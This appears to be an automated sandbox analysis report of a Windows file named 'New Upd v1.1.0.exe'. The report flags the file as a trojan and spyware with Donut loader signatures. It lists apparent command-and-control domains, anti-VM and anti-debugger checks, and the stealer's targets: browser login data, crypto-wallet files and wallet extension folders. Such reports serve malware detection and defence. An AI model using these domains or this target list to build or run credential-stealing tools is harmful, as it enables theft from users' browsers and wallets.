              Source: New Upd v1.1.0.exe, 00000000.00000003.1838952572.00000000039E7000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1838721426.00000000039E7000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1816237689.0000000003A33000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1816371099.00000000039E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: New Upd v1.1.0.exe, 00000000.00000003.1816371099.00000000039C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: New Upd v1.1.0.exe, 00000000.00000003.1861824939.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: New Upd v1.1.0.exe, 00000000.00000003.1861824939.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: New Upd v1.1.0.exe, 00000000.00000003.1861824939.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: New Upd v1.1.0.exe, 00000000.00000003.1861824939.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: New Upd v1.1.0.exe, 00000000.00000003.1861824939.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49745 version: TLS 1.2
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_2_007F9170 BeginPaint,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,BitBlt,SelectPalette,SelectObject,DeleteDC,EndPaint,DeleteObject,DeleteObject,GetAsyncKeyState,GetTickCount,KillTimer,SendMessageA,DestroyWindow,0_2_007F9170

              System Summary

              barindex
              Source: 00000000.00000002.1957889164.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E37E210_3_00E37E21
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E37E210_3_00E37E21
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E37E210_3_00E37E21
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E37E210_3_00E37E21
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E37E210_3_00E37E21
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E37E210_3_00E37E21
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E37E210_3_00E37E21
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E37E210_3_00E37E21
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E37E210_3_00E37E21
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E37E210_3_00E37E21
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E37E210_3_00E37E21
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E37E210_3_00E37E21
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E37E210_3_00E37E21
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E37E210_3_00E37E21
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E37E210_3_00E37E21
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E37E210_3_00E37E21
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_2_008154A50_2_008154A5
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_2_00814D3A0_2_00814D3A
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_2_0081C0DB0_2_0081C0DB
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_2_008150200_2_00815020
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_2_0081B2010_2_0081B201
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_2_008152130_2_00815213
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_2_0080E2300_2_0080E230
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_2_0081D2310_2_0081D231
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_2_0080B2540_2_0080B254
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_2_0080735C0_2_0080735C
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_2_008133620_2_00813362
              Source: New Upd v1.1.0.exeStatic PE information: invalid certificate
              Source: New Upd v1.1.0.exe, 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCatTools_Manager.exe<?xml version='1.0' encoding='UTF-8' standalone='yes'?> vs New Upd v1.1.0.exe
              Source: New Upd v1.1.0.exe, 00000000.00000003.1766578766.0000000002EF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCatTools_Manager.exe<?xml version='1.0' encoding='UTF-8' standalone='yes'?> vs New Upd v1.1.0.exe
              Source: New Upd v1.1.0.exeBinary or memory string: OriginalFilenameCatTools_Manager.exe<?xml version='1.0' encoding='UTF-8' standalone='yes'?> vs New Upd v1.1.0.exe
              Source: New Upd v1.1.0.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 00000000.00000002.1957889164.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: New Upd v1.1.0.exeStatic PE information: Section: .pdata ZLIB complexity 1.0001650421047508
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: New Upd v1.1.0.exe, 00000000.00000003.1816091583.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1838777067.00000000039A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile read: C:\Users\user\Desktop\New Upd v1.1.0.exeJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: New Upd v1.1.0.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: New Upd v1.1.0.exeStatic file information: File size 2510896 > 1048576
              Source: New Upd v1.1.0.exeStatic PE information: Raw size of .pdata is bigger than: 0x100000 < 0x141000
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_2_007FF400 _memset,_memset,LoadLibraryA,GetProcAddress,0_2_007FF400
              Source: initial sampleStatic PE information: section where entry point is pointing to: .text1
              Source: New Upd v1.1.0.exeStatic PE information: real checksum: 0x94f2747 should be: 0x2698da
              Source: New Upd v1.1.0.exeStatic PE information: section name: .text1
              Source: New Upd v1.1.0.exeStatic PE information: section name: .adata
              Source: New Upd v1.1.0.exeStatic PE information: section name: .data1
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E28A78 push ebp; retf 0071h0_3_00E28A8A
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E28A78 push ebp; retf 0071h0_3_00E28A8A
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E28A78 push ebp; retf 0071h0_3_00E28A8A
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E28A78 push ebp; retf 0071h0_3_00E28A8A
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E28A78 push ebp; retf 0071h0_3_00E28A8A
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E29251 push esi; retn 0072h0_3_00E29252
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E29251 push esi; retn 0072h0_3_00E29252
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E29251 push esi; retn 0072h0_3_00E29252
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E29251 push esi; retn 0072h0_3_00E29252
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E29251 push esi; retn 0072h0_3_00E29252
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E28280 push esp; retf 0_3_00E28292
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E28280 push esp; retf 0_3_00E28292
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E28280 push esp; retf 0_3_00E28292
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E28280 push esp; retf 0_3_00E28292
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E28280 push esp; retf 0_3_00E28292
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E29291 push esi; retf 0072h0_3_00E29292
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E29291 push esi; retf 0072h0_3_00E29292
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E29291 push esi; retf 0072h0_3_00E29292
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E29291 push esi; retf 0072h0_3_00E29292
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E29291 push esi; retf 0072h0_3_00E29292
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E28A78 push ebp; retf 0071h0_3_00E28A8A
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E28A78 push ebp; retf 0071h0_3_00E28A8A
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E28A78 push ebp; retf 0071h0_3_00E28A8A
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E28A78 push ebp; retf 0071h0_3_00E28A8A
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E28A78 push ebp; retf 0071h0_3_00E28A8A
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E29251 push esi; retn 0072h0_3_00E29252
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E29251 push esi; retn 0072h0_3_00E29252
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E29251 push esi; retn 0072h0_3_00E29252
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E29251 push esi; retn 0072h0_3_00E29252
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E29251 push esi; retn 0072h0_3_00E29252
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_3_00E28280 push esp; retf 0_3_00E28292
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-8644
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeAPI coverage: 0.6 %
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exe TID: 7704Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exe TID: 7728Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: New Upd v1.1.0.exe, 00000000.00000003.1957164332.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1935726270.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000002.1958057888.0000000000D91000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1956886066.0000000000D91000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815160136.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000002.1958057888.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1888319727.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909433351.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1956886066.0000000000DBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_2_0080B245 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0080B245
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_2_007FF400 _memset,_memset,LoadLibraryA,GetProcAddress,0_2_007FF400
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_2_0080B245 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0080B245

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: New Upd v1.1.0.exeString found in binary or memory: cashfuzysao.buzz
              Source: New Upd v1.1.0.exeString found in binary or memory: hummskitnj.buzz
              Source: New Upd v1.1.0.exeString found in binary or memory: screwamusresz.buzz
              Source: New Upd v1.1.0.exeString found in binary or memory: appliacnesot.buzz
              Source: New Upd v1.1.0.exeString found in binary or memory: scentniej.buzz
              Source: New Upd v1.1.0.exeString found in binary or memory: inherineau.buzz
              Source: New Upd v1.1.0.exeString found in binary or memory: prisonyfork.buzz
              Source: New Upd v1.1.0.exeString found in binary or memory: rebuildeso.buzz
              Source: New Upd v1.1.0.exeString found in binary or memory: begguinnerz.biz
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,_malloc,GetLocaleInfoA,MultiByteToWideChar,__freea,0_2_008190C3
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_008180D7
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,0_2_00810004
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_00818018
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,0_2_008191FE
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_0081813C
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,0_2_00818178
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,0_2_00819239
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_00819376
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeCode function: 0_2_00801000 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_00801000
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: New Upd v1.1.0.exe, 00000000.00000002.1958189458.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1935683900.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1956864556.0000000000E24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: New Upd v1.1.0.exe PID: 7576, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: New Upd v1.1.0.exeString found in binary or memory: s/Electrum-LTC
              Source: New Upd v1.1.0.exe, 00000000.00000003.1957164332.0000000000DBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: New Upd v1.1.0.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
              Source: New Upd v1.1.0.exe, 00000000.00000003.1957164332.0000000000DBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: New Upd v1.1.0.exe, 00000000.00000003.1888319727.0000000000DBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: New Upd v1.1.0.exeString found in binary or memory: ExodusWeb3
              Source: New Upd v1.1.0.exe, 00000000.00000003.1957164332.0000000000DBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: New Upd v1.1.0.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: New Upd v1.1.0.exe, 00000000.00000003.1888176130.0000000000E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\New Upd v1.1.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
